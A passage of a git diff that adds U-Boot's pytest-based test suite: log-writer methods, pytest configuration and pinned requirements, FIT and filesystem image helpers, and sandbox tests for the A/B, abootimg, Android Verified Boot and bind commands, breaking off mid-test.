msg, anchor) + + def status_skipped(self, msg, anchor=None): + """Write a note to the log file describing skipped test(s). + + Args: + msg: A message describing the skipped test(s). + anchor: Optional internal link target. + + Returns: + Nothing. 
+ """ + + self._note("status-skipped", msg, anchor) + + def status_xfail(self, msg, anchor=None): + """Write a note to the log file describing xfailed test(s). + + Args: + msg: A message describing the xfailed test(s). + anchor: Optional internal link target. + + Returns: + Nothing. + """ + + self._note("status-xfail", msg, anchor) + + def status_xpass(self, msg, anchor=None): + """Write a note to the log file describing xpassed test(s). + + Args: + msg: A message describing the xpassed test(s). + anchor: Optional internal link target. + + Returns: + Nothing. + """ + + self._note("status-xpass", msg, anchor) + + def status_fail(self, msg, anchor=None): + """Write a note to the log file describing failed test(s). + + Args: + msg: A message describing the failed test(s). + anchor: Optional internal link target. + + Returns: + Nothing. + """ + + self._note("status-fail", msg, anchor) + + def get_stream(self, name, chained_file=None): + """Create an object to log a single stream's data into the log file. + + This creates a "file-like" object that can be written to in order to + write a single stream's data to the log file. The implementation will + handle any required interleaving of data (from multiple streams) in + the log, in a way that makes it obvious which stream each bit of data + came from. + + Args: + name: The name of the stream. + chained_file: The file-like object to which all stream data should + be logged to in addition to this log. Can be None. + + Returns: + A file-like object. + """ + + return LogfileStream(self, name, chained_file) + + def get_runner(self, name, chained_file=None): + """Create an object that executes processes and logs their output. + + Args: + name: The name of this sub-process. + chained_file: The file-like object to which all stream data should + be logged to in addition to logfile. Can be None. + + Returns: + A RunAndLog object. + """ + + return RunAndLog(self, name, chained_file) + + def write(self, stream, data, implicit=False): + """Write stream data into the log file. + + This function should only be used by instances of LogfileStream or + RunAndLog. + + Args: + stream: The stream whose data is being logged. + data: The data to log. + implicit: Boolean indicating whether data actually appeared in the + stream, or was implicitly generated. A valid use-case is to + repeat a shell prompt at the start of each separate log + section, which makes the log sections more readable in + isolation. + + Returns: + Nothing. + """ + + if stream != self.last_stream: + self._terminate_stream() + self.f.write('<div class="stream block">\n') + self.f.write('<div class="stream-header block-header">Stream: ' + + stream.name + '</div>\n') + self.f.write('<div class="stream-content block-content">\n') + self.f.write('<pre>') + if implicit: + self.f.write('<span class="implicit">') + self.f.write(self._escape(data)) + if implicit: + self.f.write('</span>') + self.last_stream = stream + + def flush(self): + """Flush the log stream, to ensure correct log interleaving. + + Args: + None. + + Returns: + Nothing. + """ + + self.f.flush() diff --git a/test/py/pytest.ini b/test/py/pytest.ini new file mode 100644 index 00000000000..26d83f83e00 --- /dev/null +++ b/test/py/pytest.ini @@ -0,0 +1,14 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2015 Stephen Warren +# Copyright (c) 2015-2016, NVIDIA CORPORATION. All rights reserved. + +# Static configuration data for pytest. pytest reads this at startup time. 
+ +[pytest] +markers = + boardspec: U-Boot: Describes the set of boards a test can/can't run on. + buildconfigspec: U-Boot: Describes Kconfig/config-header constraints. + notbuildconfigspec: U-Boot: Describes required disabled Kconfig options. + requiredtool: U-Boot: Required host tools for a test. + slow: U-Boot: Specific test will run slowly. + singlethread: Cannot run in parallel diff --git a/test/py/requirements.txt b/test/py/requirements.txt new file mode 100644 index 00000000000..0f67c3c6194 --- /dev/null +++ b/test/py/requirements.txt @@ -0,0 +1,30 @@ +atomicwrites==1.4.1 +attrs==19.3.0 +concurrencytest==0.1.2 +coverage==4.5.4 +extras==1.0.0 +filelock==3.0.12 +fixtures==3.0.0 +importlib-metadata==0.23 +linecache2==1.0.0 +more-itertools==7.2.0 +packaging==23.2 +pbr==5.4.3 +pluggy==0.13.0 +py==1.11.0 +pycryptodomex==3.19.1 +pyelftools==0.27 +pygit2==1.13.3 +pyparsing==3.0.7 +pytest==6.2.5 +pytest-xdist==2.5.0 +python-mimeparse==1.6.0 +python-subunit==1.3.0 +requests==2.31.0 +setuptools==65.5.1 +six==1.16.0 +testtools==2.3.0 +traceback2==1.4.0 +unittest2==1.1.0 +wcwidth==0.1.7 +zipp==0.6.0 diff --git a/test/py/test.py b/test/py/test.py new file mode 100755 index 00000000000..95859a66e29 --- /dev/null +++ b/test/py/test.py @@ -0,0 +1,25 @@ +#!/usr/bin/env python3 +# SPDX-License-Identifier: GPL-2.0 + +# Copyright (c) 2015 Stephen Warren +# Copyright (c) 2015-2016, NVIDIA CORPORATION. All rights reserved. + +# Wrapper script to invoke pytest with the directory name that contains the +# U-Boot tests. + +import os +import os.path +import sys +import pytest +from pkg_resources import load_entry_point + +if __name__ == '__main__': + # argv; py.test test_directory_name user-supplied-arguments + args = [os.path.dirname(__file__) + '/tests'] + args.extend(sys.argv) + + # Use short format by default + if not [arg for arg in args if '--tb=' in arg]: + args.append('--tb=short') + + sys.exit(pytest.main(args)) diff --git a/test/py/tests/bootstd/armbian.bmp.xz b/test/py/tests/bootstd/armbian.bmp.xz Binary files differnew file mode 100644 index 00000000000..ad137ea6e6d --- /dev/null +++ b/test/py/tests/bootstd/armbian.bmp.xz diff --git a/test/py/tests/bootstd/mmc1.img.xz b/test/py/tests/bootstd/mmc1.img.xz Binary files differnew file mode 100644 index 00000000000..cebf7b9c53b --- /dev/null +++ b/test/py/tests/bootstd/mmc1.img.xz diff --git a/test/py/tests/bootstd/mmc4.img.xz b/test/py/tests/bootstd/mmc4.img.xz Binary files differnew file mode 100644 index 00000000000..f4db011969f --- /dev/null +++ b/test/py/tests/bootstd/mmc4.img.xz diff --git a/test/py/tests/fit_util.py b/test/py/tests/fit_util.py new file mode 100644 index 00000000000..79718d431a0 --- /dev/null +++ b/test/py/tests/fit_util.py @@ -0,0 +1,93 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright 2022 Google LLC + +"""Common utility functions for FIT tests""" + +import os + +import u_boot_utils as util + +def make_fname(cons, basename): + """Make a temporary filename + + Args: + cons (ConsoleBase): u_boot_console to use + basename (str): Base name of file to create (within temporary directory) + Return: + Temporary filename + """ + + return os.path.join(cons.config.build_dir, basename) + +def make_its(cons, base_its, params, basename='test.its'): + """Make a sample .its file with parameters embedded + + Args: + cons (ConsoleBase): u_boot_console to use + base_its (str): Template text for the .its file, typically containing + %() references + params (dict of str): Parameters to embed in the %() strings + basename (str): base name to 
write to (will be placed in the temp dir) + Returns: + str: Filename of .its file created + """ + its = make_fname(cons, basename) + with open(its, 'w', encoding='utf-8') as outf: + print(base_its % params, file=outf) + return its + +def make_fit(cons, mkimage, base_its, params, basename='test.fit', base_fdt=None): + """Make a sample .fit file ready for loading + + This creates a .its script with the selected parameters and uses mkimage to + turn this into a .fit image. + + Args: + cons (ConsoleBase): u_boot_console to use + mkimage (str): Filename of 'mkimage' utility + base_its (str): Template text for the .its file, typically containing + %() references + params (dict of str): Parameters to embed in the %() strings + basename (str): base name to write to (will be placed in the temp dir) + Return: + Filename of .fit file created + """ + fit = make_fname(cons, basename) + its = make_its(cons, base_its, params) + util.run_and_log(cons, [mkimage, '-f', its, fit]) + if base_fdt: + with open(make_fname(cons, 'u-boot.dts'), 'w') as fd: + fd.write(base_fdt) + return fit + +def make_kernel(cons, basename, text): + """Make a sample kernel with test data + + Args: + cons (ConsoleBase): u_boot_console to use + basename (str): base name to write to (will be placed in the temp dir) + text (str): Contents of the kernel file (will be repeated 100 times) + Returns: + str: Full path and filename of the kernel it created + """ + fname = make_fname(cons, basename) + data = '' + for i in range(100): + data += f'this {text} {i} is unlikely to boot\n' + with open(fname, 'w', encoding='utf-8') as outf: + print(data, file=outf) + return fname + +def make_dtb(cons, base_fdt, basename): + """Make a sample .dts file and compile it to a .dtb + + Returns: + cons (ConsoleBase): u_boot_console to use + Filename of .dtb file created + """ + src = make_fname(cons, f'{basename}.dts') + dtb = make_fname(cons, f'{basename}.dtb') + with open(src, 'w', encoding='utf-8') as outf: + outf.write(base_fdt) + util.run_and_log(cons, ['dtc', src, '-O', 'dtb', '-o', dtb]) + return dtb diff --git a/test/py/tests/fs_helper.py b/test/py/tests/fs_helper.py new file mode 100644 index 00000000000..380f4c4dca3 --- /dev/null +++ b/test/py/tests/fs_helper.py @@ -0,0 +1,69 @@ +# SPDX-License-Identifier: GPL-2.0+ +# +# Copyright (c) 2018, Linaro Limited +# Author: Takahiro Akashi <takahiro.akashi@linaro.org> + +"""Helper functions for dealing with filesystems""" + +import re +import os +from subprocess import call, check_call, check_output, CalledProcessError + +def mk_fs(config, fs_type, size, prefix, size_gran = 0x100000): + """Create a file system volume + + Args: + config (u_boot_config): U-Boot configuration + fs_type (str): File system type, e.g. 
'ext4' + size (int): Size of file system in bytes + prefix (str): Prefix string of volume's file name + size_gran (int): Size granularity of file system image in bytes + + Raises: + CalledProcessError: if any error occurs when creating the filesystem + """ + fs_img = f'{prefix}.{fs_type}.img' + fs_img = os.path.join(config.persistent_data_dir, fs_img) + + if fs_type == 'fat12': + mkfs_opt = '-F 12' + elif fs_type == 'fat16': + mkfs_opt = '-F 16' + elif fs_type == 'fat32': + mkfs_opt = '-F 32' + else: + mkfs_opt = '' + + if re.match('fat', fs_type): + fs_lnxtype = 'vfat' + else: + fs_lnxtype = fs_type + + count = (size + size_gran - 1) // size_gran + + # Some distributions do not add /sbin to the default PATH, where mkfs lives + if '/sbin' not in os.environ["PATH"].split(os.pathsep): + os.environ["PATH"] += os.pathsep + '/sbin' + + try: + check_call(f'rm -f {fs_img}', shell=True) + check_call(f'dd if=/dev/zero of={fs_img} bs={size_gran} count={count}', + shell=True) + check_call(f'mkfs.{fs_lnxtype} {mkfs_opt} {fs_img}', shell=True) + if fs_type == 'ext4': + sb_content = check_output(f'tune2fs -l {fs_img}', + shell=True).decode() + if 'metadata_csum' in sb_content: + check_call(f'tune2fs -O ^metadata_csum {fs_img}', shell=True) + return fs_img + except CalledProcessError: + call(f'rm -f {fs_img}', shell=True) + raise + +# Just for trying out +if __name__ == "__main__": + import collections + + CNF= collections.namedtuple('config', 'persistent_data_dir') + + mk_fs(CNF('.'), 'ext4', 0x1000000, 'pref') diff --git a/test/py/tests/source.its b/test/py/tests/source.its new file mode 100644 index 00000000000..3c62f777f17 --- /dev/null +++ b/test/py/tests/source.its @@ -0,0 +1,43 @@ +/dts-v1/; + +/ { + description = "FIT image to test the source command"; + #address-cells = <1>; + + images { + default = "script-1"; + + script-1 { + data = "echo 1"; + type = "script"; + arch = "sandbox"; + compression = "none"; + }; + + script-2 { + data = "echo 2"; + type = "script"; + arch = "sandbox"; + compression = "none"; + }; + + not-a-script { + data = "echo 3"; + type = "kernel"; + arch = "sandbox"; + compression = "none"; + }; + }; + + configurations { + default = "conf-2"; + + conf-1 { + script = "script-1"; + }; + + conf-2 { + script = "script-2"; + }; + }; +}; diff --git a/test/py/tests/test_000_version.py b/test/py/tests/test_000_version.py new file mode 100644 index 00000000000..bd089ab5439 --- /dev/null +++ b/test/py/tests/test_000_version.py @@ -0,0 +1,19 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2015 Stephen Warren +# Copyright (c) 2016, NVIDIA CORPORATION. All rights reserved. + +# pytest runs tests the order of their module path, which is related to the +# filename containing the test. This file is named such that it is sorted +# first, simply as a very basic sanity check of the functionality of the U-Boot +# command prompt. + +def test_version(u_boot_console): + """Test that the "version" command prints the U-Boot version.""" + + # "version" prints the U-Boot sign-on message. This is usually considered + # an error, so that any unexpected reboot causes an error. Here, this + # error detection is disabled since the sign-on message is expected. + with u_boot_console.disable_check('main_signon'): + response = u_boot_console.run_command('version') + # Ensure "version" printed what we expected. 
+ u_boot_console.validate_version_string_in_text(response) diff --git a/test/py/tests/test_android/test_ab.py b/test/py/tests/test_android/test_ab.py new file mode 100644 index 00000000000..c79cb07fda3 --- /dev/null +++ b/test/py/tests/test_android/test_ab.py @@ -0,0 +1,75 @@ +# SPDX-License-Identifier: GPL-2.0 +# (C) Copyright 2018 Texas Instruments, <www.ti.com> + +# Test A/B update commands. + +import os +import pytest +import u_boot_utils + +class ABTestDiskImage(object): + """Disk Image used by the A/B tests.""" + + def __init__(self, u_boot_console): + """Initialize a new ABTestDiskImage object. + + Args: + u_boot_console: A U-Boot console. + + Returns: + Nothing. + """ + + filename = 'test_ab_disk_image.bin' + + persistent = u_boot_console.config.persistent_data_dir + '/' + filename + self.path = u_boot_console.config.result_dir + '/' + filename + + with u_boot_utils.persistent_file_helper(u_boot_console.log, persistent): + if os.path.exists(persistent): + u_boot_console.log.action('Disk image file ' + persistent + + ' already exists') + else: + u_boot_console.log.action('Generating ' + persistent) + fd = os.open(persistent, os.O_RDWR | os.O_CREAT) + os.ftruncate(fd, 524288) + os.close(fd) + cmd = ('sgdisk', persistent) + u_boot_utils.run_and_log(u_boot_console, cmd) + + cmd = ('sgdisk', '--new=1:64:512', '--change-name=1:misc', + persistent) + u_boot_utils.run_and_log(u_boot_console, cmd) + cmd = ('sgdisk', '--load-backup=' + persistent) + u_boot_utils.run_and_log(u_boot_console, cmd) + + cmd = ('cp', persistent, self.path) + u_boot_utils.run_and_log(u_boot_console, cmd) + +di = None +@pytest.fixture(scope='function') +def ab_disk_image(u_boot_console): + global di + if not di: + di = ABTestDiskImage(u_boot_console) + return di + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('android_ab') +@pytest.mark.buildconfigspec('cmd_ab_select') +@pytest.mark.requiredtool('sgdisk') +def test_ab(ab_disk_image, u_boot_console): + """Test the 'ab_select' command.""" + + u_boot_console.run_command('host bind 0 ' + ab_disk_image.path) + + output = u_boot_console.run_command('ab_select slot_name host 0#misc') + assert 're-initializing A/B metadata' in output + assert 'Attempting slot a, tries remaining 7' in output + output = u_boot_console.run_command('printenv slot_name') + assert 'slot_name=a' in output + + output = u_boot_console.run_command('ab_select slot_name host 0:1') + assert 'Attempting slot b, tries remaining 7' in output + output = u_boot_console.run_command('printenv slot_name') + assert 'slot_name=b' in output diff --git a/test/py/tests/test_android/test_abootimg.py b/test/py/tests/test_android/test_abootimg.py new file mode 100644 index 00000000000..6a8ff34538b --- /dev/null +++ b/test/py/tests/test_android/test_abootimg.py @@ -0,0 +1,269 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2020 +# Author: Sam Protsenko <joe.skb7@gmail.com> + +# Test U-Boot's "abootimg" commands. + +import os +import pytest +import u_boot_utils + +""" +These tests rely on disk image (boot.img), which is automatically created by +the test from the stored hex dump. This is done to avoid the dependency on the +most recent mkbootimg tool from AOSP/master. 
Here is the list of commands which +was used to generate the boot.img and obtain compressed hex dump from it: + + $ echo '/dts-v1/; / { model = "x1"; compatible = "y1,z1"; };' > test1.dts + $ echo '/dts-v1/; / { model = "x2"; compatible = "y2,z2"; };' > test2.dts + $ dtc test1.dts > dt1.dtb + $ dtc test2.dts > dt2.dtb + $ cat dt1.dtb dt2.dtb > dtb.img + $ echo 'kernel payload' > kernel + $ echo 'ramdisk payload' > ramdisk.img + $ mkbootimg --kernel ./kernel --ramdisk ./ramdisk.img \ + --cmdline "cmdline test" --dtb ./dtb.img \ + --os_version R --os_patch_level 2019-06-05 \ + --header_version 2 --output boot.img + $ gzip -9 boot.img + $ xxd -p boot.img.gz > boot.img.gz.hex + +Now one can obtain original boot.img from this hex dump like this: + + $ xxd -r -p boot.img.gz.hex boot.img.gz + $ gunzip -9 boot.img.gz + +For boot image header version 4, these tests rely on two images that are generated +using the same steps above : + +1- boot.img : + $ mkbootimg --kernel ./kernel --ramdisk ./ramdisk.img \ + --cmdline "cmdline test" --dtb ./dtb.img \ + --os_version R --os_patch_level 2019-06-05 \ + --header_version 4 --output ./boot.img + +2- vendor_boot.img + $ mkbootimg --kernel ./kernel --ramdisk ./ramdisk.img \ + --cmdline "cmdline test" --dtb ./dtb.img \ + --os_version R --os_patch_level 2019-06-05 \ + --pagesize 4096 --vendor_ramdisk ./ramdisk.img \ + --header_version 4 --vendor_boot ./vboot.img \ + +""" + +# boot.img.gz hex dump +img_hex = """1f8b08084844af5d0203626f6f742e696d670073f47309f2f77451e46700 +820606010106301084501f04181819041838181898803c3346060c909c9b +92939997aa50925a5cc2300a461c3078b2e1793c4b876fd92db97939fb6c +b7762ffff07d345446c1281805e8a0868d81e117a45e111c0d8dc101b253 +8bf25273140a122b73f21353b8460364148c8251300a46c1281801a02831 +3725b3387bb401300a46c1281805a360148c207081f7df5b20550bc41640 +9c03c41a0c90f17fe85400986d82452b6c3680198a192a0ce17c3610ae34 +d4a9820881a70f3873f35352731892f3730b124b32937252a96bb9119ae5 +463a5546f82c1f05a360148c8251300a462e000085bf67f200200000""" + +# boot img v4 hex dump +boot_img_hex = """1f8b080827b0cd630203626f6f742e696d6700edd8bd0d82601885d1d7c4 +58d8c808b88195bd098d8d246e40e42b083f1aa0717be99d003d277916b8 +e5bddc8a7b792d8e8788c896ce9b88d32ebe6c971e7ddd3543cae734cd01 +c0ffc84c0000b0766d1a87d4e5afeadd3dab7a6f10000000f84163d5d7cd +d43a000000000000000060c53e7544995700400000""" + +# vendor boot image v4 hex dump +vboot_img_hex = """1f8b0808baaecd63020376626f6f742e696d6700edd8310b824018c6f1b3 +222a08f41b3436b4280dcdd19c11d16ee9109d18d59042d047ec8b04cd0d +d19d5a4345534bf6ffc173ef29272f38e93b1d0ec67dd79d548462aa1cd2 +d5d20b0000f8438678f90c18d584b8a4bbb3a557991ecb2a0000f80d6b2f +f4179b656be5c532f2fc066f040000000080e23936af2755f62a3d918df1 +db2a7ab67f9ffdeb7df7cda3465ecb79c4ce7e5c577562bb9364b74449a5 +1e467e20c53c0a57de763193c1779b3b4fcd9d4ee27c6a0e00000000c0ff +309ffea7010000000040f1dc004129855400400000""" + +# Expected response for "abootimg dtb_dump" command +dtb_dump_resp="""## DTB area contents (concat format): + - DTB #0: + (DTB)size = 125 + (DTB)model = x1 + (DTB)compatible = y1,z1 + - DTB #1: + (DTB)size = 125 + (DTB)model = x2 + (DTB)compatible = y2,z2""" +# Address in RAM where to load the boot image ('abootimg' looks in $loadaddr) +loadaddr = 0x1000 +# Address in RAM where to load the vendor boot image ('abootimg' looks in $vloadaddr) +vloadaddr= 0x10000 +# Expected DTB #1 offset from the boot image start address +dtb1_offset = 0x187d +# Expected DTB offset from the vendor boot image start address +dtb2_offset = 0x207d +# DTB #1 start address 
in RAM +dtb1_addr = loadaddr + dtb1_offset +# DTB #2 start address in RAM +dtb2_addr = vloadaddr + dtb2_offset + +class AbootimgTestDiskImage(object): + """Disk image used by abootimg tests.""" + + def __init__(self, u_boot_console, image_name, hex_img): + """Initialize a new AbootimgDiskImage object. + + Args: + u_boot_console: A U-Boot console. + + Returns: + Nothing. + """ + + gz_hex = u_boot_console.config.persistent_data_dir + '/' + image_name + '.gz.hex' + gz = u_boot_console.config.persistent_data_dir + '/' + image_name + '.gz' + + filename = image_name + persistent = u_boot_console.config.persistent_data_dir + '/' + filename + self.path = u_boot_console.config.result_dir + '/' + filename + u_boot_console.log.action('persistent is ' + persistent) + with u_boot_utils.persistent_file_helper(u_boot_console.log, persistent): + if os.path.exists(persistent): + u_boot_console.log.action('Disk image file ' + persistent + + ' already exists') + else: + u_boot_console.log.action('Generating ' + persistent) + + f = open(gz_hex, "w") + f.write(hex_img) + f.close() + cmd = ('xxd', '-r', '-p', gz_hex, gz) + u_boot_utils.run_and_log(u_boot_console, cmd) + cmd = ('gunzip', '-9', gz) + u_boot_utils.run_and_log(u_boot_console, cmd) + + cmd = ('cp', persistent, self.path) + u_boot_utils.run_and_log(u_boot_console, cmd) + +gtdi1 = None +@pytest.fixture(scope='function') +def abootimg_disk_image(u_boot_console): + """pytest fixture to provide a AbootimgTestDiskImage object to tests. + This is function-scoped because it uses u_boot_console, which is also + function-scoped. However, we don't need to actually do any function-scope + work, so this simply returns the same object over and over each time.""" + + global gtdi1 + if not gtdi1: + gtdi1 = AbootimgTestDiskImage(u_boot_console, 'boot.img', img_hex) + return gtdi1 + +gtdi2 = None +@pytest.fixture(scope='function') +def abootimgv4_disk_image_vboot(u_boot_console): + """pytest fixture to provide a AbootimgTestDiskImage object to tests. + This is function-scoped because it uses u_boot_console, which is also + function-scoped. However, we don't need to actually do any function-scope + work, so this simply returns the same object over and over each time.""" + + global gtdi2 + if not gtdi2: + gtdi2 = AbootimgTestDiskImage(u_boot_console, 'vendor_boot.img', vboot_img_hex) + return gtdi2 + +gtdi3 = None +@pytest.fixture(scope='function') +def abootimgv4_disk_image_boot(u_boot_console): + """pytest fixture to provide a AbootimgTestDiskImage object to tests. + This is function-scoped because it uses u_boot_console, which is also + function-scoped. 
However, we don't need to actually do any function-scope + work, so this simply returns the same object over and over each time.""" + + global gtdi3 + if not gtdi3: + gtdi3 = AbootimgTestDiskImage(u_boot_console, 'bootv4.img', boot_img_hex) + return gtdi3 + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('android_boot_image') +@pytest.mark.buildconfigspec('cmd_abootimg') +@pytest.mark.buildconfigspec('cmd_fdt') +@pytest.mark.requiredtool('xxd') +@pytest.mark.requiredtool('gunzip') +def test_abootimg(abootimg_disk_image, u_boot_console): + """Test the 'abootimg' command.""" + + u_boot_console.log.action('Loading disk image to RAM...') + u_boot_console.run_command('setenv loadaddr 0x%x' % (loadaddr)) + u_boot_console.run_command('host load hostfs - 0x%x %s' % (loadaddr, + abootimg_disk_image.path)) + + u_boot_console.log.action('Testing \'abootimg get ver\'...') + response = u_boot_console.run_command('abootimg get ver') + assert response == "2" + u_boot_console.run_command('abootimg get ver v') + response = u_boot_console.run_command('env print v') + assert response == 'v=2' + + u_boot_console.log.action('Testing \'abootimg get recovery_dtbo\'...') + response = u_boot_console.run_command('abootimg get recovery_dtbo a') + assert response == 'Error: recovery_dtbo_size is 0' + + u_boot_console.log.action('Testing \'abootimg dump dtb\'...') + response = u_boot_console.run_command('abootimg dump dtb').replace('\r', '') + assert response == dtb_dump_resp + + u_boot_console.log.action('Testing \'abootimg get dtb_load_addr\'...') + u_boot_console.run_command('abootimg get dtb_load_addr a') + response = u_boot_console.run_command('env print a') + assert response == 'a=11f00000' + + u_boot_console.log.action('Testing \'abootimg get dtb --index\'...') + u_boot_console.run_command('abootimg get dtb --index=1 dtb1_start') + response = u_boot_console.run_command('env print dtb1_start') + correct_str = "dtb1_start=%x" % (dtb1_addr) + assert response == correct_str + u_boot_console.run_command('fdt addr $dtb1_start') + u_boot_console.run_command('fdt get value v / model') + response = u_boot_console.run_command('env print v') + assert response == 'v=x2' + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('android_boot_image') +@pytest.mark.buildconfigspec('cmd_abootimg') +@pytest.mark.buildconfigspec('cmd_fdt') +@pytest.mark.requiredtool('xxd') +@pytest.mark.requiredtool('gunzip') +def test_abootimgv4(abootimgv4_disk_image_vboot, abootimgv4_disk_image_boot, u_boot_console): + """Test the 'abootimg' command with boot image header v4.""" + + cons = u_boot_console + cons.log.action('Loading disk image to RAM...') + cons.run_command('setenv loadaddr 0x%x' % (loadaddr)) + cons.run_command('setenv vloadaddr 0x%x' % (vloadaddr)) + cons.run_command('host load hostfs - 0x%x %s' % (vloadaddr, + abootimgv4_disk_image_vboot.path)) + cons.run_command('host load hostfs - 0x%x %s' % (loadaddr, + abootimgv4_disk_image_boot.path)) + cons.run_command('abootimg addr 0x%x 0x%x' % (loadaddr, vloadaddr)) + cons.log.action('Testing \'abootimg get ver\'...') + response = cons.run_command('abootimg get ver') + assert response == "4" + cons.run_command('abootimg get ver v') + response = cons.run_command('env print v') + assert response == 'v=4' + + cons.log.action('Testing \'abootimg get recovery_dtbo\'...') + response = cons.run_command('abootimg get recovery_dtbo a') + assert response == 'Error: header version must be >= 1 and <= 2 to get dtbo' + + cons.log.action('Testing \'abootimg get 
dtb_load_addr\'...') + cons.run_command('abootimg get dtb_load_addr a') + response = cons.run_command('env print a') + assert response == 'a=11f00000' + + cons.log.action('Testing \'abootimg get dtb --index\'...') + cons.run_command('abootimg get dtb --index=1 dtb2_start') + response = cons.run_command('env print dtb2_start') + correct_str = "dtb2_start=%x" % (dtb2_addr) + assert response == correct_str + + cons.run_command('fdt addr $dtb2_start') + cons.run_command('fdt get value v / model') + response = cons.run_command('env print v') + assert response == 'v=x2' diff --git a/test/py/tests/test_android/test_avb.py b/test/py/tests/test_android/test_avb.py new file mode 100644 index 00000000000..865efbca4de --- /dev/null +++ b/test/py/tests/test_android/test_avb.py @@ -0,0 +1,138 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2018, Linaro Limited +# +# Android Verified Boot 2.0 Test + +""" +This tests Android Verified Boot 2.0 support in U-Boot: + +For additional details about how to build proper vbmeta partition +check doc/android/avb2.rst + +For configuration verification: +- Corrupt boot partition and check for failure +- Corrupt vbmeta partition and check for failure +""" + +import pytest +import u_boot_utils as util + +# defauld mmc id +mmc_dev = 1 +temp_addr = 0x90000000 +temp_addr2 = 0x90002000 + +@pytest.mark.buildconfigspec('cmd_avb') +@pytest.mark.buildconfigspec('cmd_mmc') +def test_avb_verify(u_boot_console): + """Run AVB 2.0 boot verification chain with avb subset of commands + """ + + success_str = "Verification passed successfully" + + response = u_boot_console.run_command('avb init %s' %str(mmc_dev)) + assert response == '' + response = u_boot_console.run_command('avb verify') + assert response.find(success_str) + + +@pytest.mark.buildconfigspec('cmd_avb') +@pytest.mark.buildconfigspec('cmd_mmc') +@pytest.mark.notbuildconfigspec('sandbox') +def test_avb_mmc_uuid(u_boot_console): + """Check if 'avb get_uuid' works, compare results with + 'part list mmc 1' output + """ + + response = u_boot_console.run_command('avb init %s' % str(mmc_dev)) + assert response == '' + + response = u_boot_console.run_command('mmc rescan; mmc dev %s' % + str(mmc_dev)) + assert response.find('is current device') + + part_lines = u_boot_console.run_command('mmc part').splitlines() + part_list = {} + cur_partname = '' + + for line in part_lines: + if '"' in line: + start_pt = line.find('"') + end_pt = line.find('"', start_pt + 1) + cur_partname = line[start_pt + 1: end_pt] + + if 'guid:' in line: + guid_to_check = line.split('guid:\t') + part_list[cur_partname] = guid_to_check[1] + + # lets check all guids with avb get_guid + for part, guid in part_list.items(): + avb_guid_resp = u_boot_console.run_command('avb get_uuid %s' % part) + assert guid == avb_guid_resp.split('UUID: ')[1] + + +@pytest.mark.buildconfigspec('cmd_avb') +def test_avb_read_rb(u_boot_console): + """Test reading rollback indexes + """ + + response = u_boot_console.run_command('avb init %s' % str(mmc_dev)) + assert response == '' + + response = u_boot_console.run_command('avb read_rb 1') + assert response == 'Rollback index: 0' + + +@pytest.mark.buildconfigspec('cmd_avb') +def test_avb_is_unlocked(u_boot_console): + """Test if device is in the unlocked state + """ + + response = u_boot_console.run_command('avb init %s' % str(mmc_dev)) + assert response == '' + + response = u_boot_console.run_command('avb is_unlocked') + assert response == 'Unlocked = 1' + + +@pytest.mark.buildconfigspec('cmd_avb') 
+@pytest.mark.buildconfigspec('cmd_mmc') +@pytest.mark.notbuildconfigspec('sandbox') +def test_avb_mmc_read(u_boot_console): + """Test mmc read operation + """ + + response = u_boot_console.run_command('mmc rescan; mmc dev %s 0' % + str(mmc_dev)) + assert response.find('is current device') + + response = u_boot_console.run_command('mmc read 0x%x 0x100 0x1' % temp_addr) + assert response.find('read: OK') + + response = u_boot_console.run_command('avb init %s' % str(mmc_dev)) + assert response == '' + + response = u_boot_console.run_command('avb read_part xloader 0 100 0x%x' % + temp_addr2) + assert response.find('Read 512 bytes') + + # Now lets compare two buffers + response = u_boot_console.run_command('cmp 0x%x 0x%x 40' % + (temp_addr, temp_addr2)) + assert response.find('64 word') + + +@pytest.mark.buildconfigspec('cmd_avb') +@pytest.mark.buildconfigspec('optee_ta_avb') +def test_avb_persistent_values(u_boot_console): + """Test reading/writing persistent storage to avb + """ + + response = u_boot_console.run_command('avb init %s' % str(mmc_dev)) + assert response == '' + + response = u_boot_console.run_command('avb write_pvalue test value_value') + assert response == 'Wrote 12 bytes' + + response = u_boot_console.run_command('avb read_pvalue test 12') + assert response == 'Read 12 bytes, value = value_value' diff --git a/test/py/tests/test_bind.py b/test/py/tests/test_bind.py new file mode 100644 index 00000000000..1376ab5ed28 --- /dev/null +++ b/test/py/tests/test_bind.py @@ -0,0 +1,193 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2016, NVIDIA CORPORATION. All rights reserved. + +""" Test for bind command """ + +import re +import pytest + +def in_tree(response, name, uclass, drv, depth, last_child): + lines = [x.strip() for x in response.splitlines()] + leaf = '' + if depth != 0: + leaf = ' ' + ' ' * (depth - 1) + if not last_child: + leaf = leaf + r'\|' + else: + leaf = leaf + '`' + + leaf = leaf + '-- ' + name + line = (r' *{:10.10} *[0-9]* \[ [ +] \] {:20.20} [` |]{}$' + .format(uclass, drv, leaf)) + prog = re.compile(line) + for l in lines: + if prog.match(l): + return True + return False + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_bind') +def test_bind_unbind_with_node(u_boot_console): + + tree = u_boot_console.run_command('dm tree') + assert in_tree(tree, 'bind-test', 'simple_bus', 'simple_bus', 0, True) + assert in_tree(tree, 'bind-test-child1', 'phy', 'phy_sandbox', 1, False) + assert in_tree(tree, 'bind-test-child2', 'simple_bus', 'simple_bus', 1, True) + + #bind usb_ether driver (which has no compatible) to usb@1 node. + ##New entry usb_ether should appear in the dm tree + response = u_boot_console.run_command('bind /usb@1 usb_ether') + assert response == '' + tree = u_boot_console.run_command('dm tree') + assert in_tree(tree, 'usb@1', 'ethernet', 'usb_ether', 1, True) + + #Unbind child #1. No error expected and all devices should be there except for bind-test-child1 + response = u_boot_console.run_command('unbind /bind-test/bind-test-child1') + assert response == '' + tree = u_boot_console.run_command('dm tree') + assert in_tree(tree, 'bind-test', 'simple_bus', 'simple_bus', 0, True) + assert 'bind-test-child1' not in tree + assert in_tree(tree, 'bind-test-child2', 'simple_bus', 'simple_bus', 1, True) + + #bind child #1. 
